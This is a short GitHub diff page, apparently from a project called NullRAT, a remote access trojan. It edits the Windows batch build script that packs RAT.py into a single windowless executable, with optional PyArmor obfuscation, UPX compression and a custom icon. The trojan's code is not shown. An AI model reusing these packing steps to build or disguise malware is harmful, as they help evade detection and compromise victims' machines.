File tree Expand file tree Collapse file tree 1 file changed +4
-4
lines changed
Expand file tree Collapse file tree 1 file changed +4
-4
lines changed Original file line number Diff line number Diff line change @@ -60,15 +60,15 @@ if %upxdd%==yes (set path=%path%;%~dp0NullRAT\upx)
6060
6161if %pyarmor% == yes (
6262 if %icon% == yes (
63- python -m pyarmor pack -e " --onefile --noconsole --icon=custom_icon.ico " RAT.py
63+ pyarmor pack -e " --onefile --noconsole --icon=custom_icon.ico " RAT.py
6464 ) else (
65- python -m pyarmor pack -e " --onefile --noconsole " RAT.py
65+ pyarmor pack -e " --onefile --noconsole " RAT.py
6666 )
6767) else (
6868 if %icon% == yes (
69- python -m pyinstaller --onefile --noconsole --icon=custom_icon.ico RAT.py
69+ pyinstaller --onefile --noconsole --icon=custom_icon.ico RAT.py
7070 ) else (
71- python -m pyinstaller --onefile --noconsole RAT.py
71+ pyinstaller --onefile --noconsole RAT.py
7272 )
7373)
7474
You can’t perform that action at this time.
0 commit comments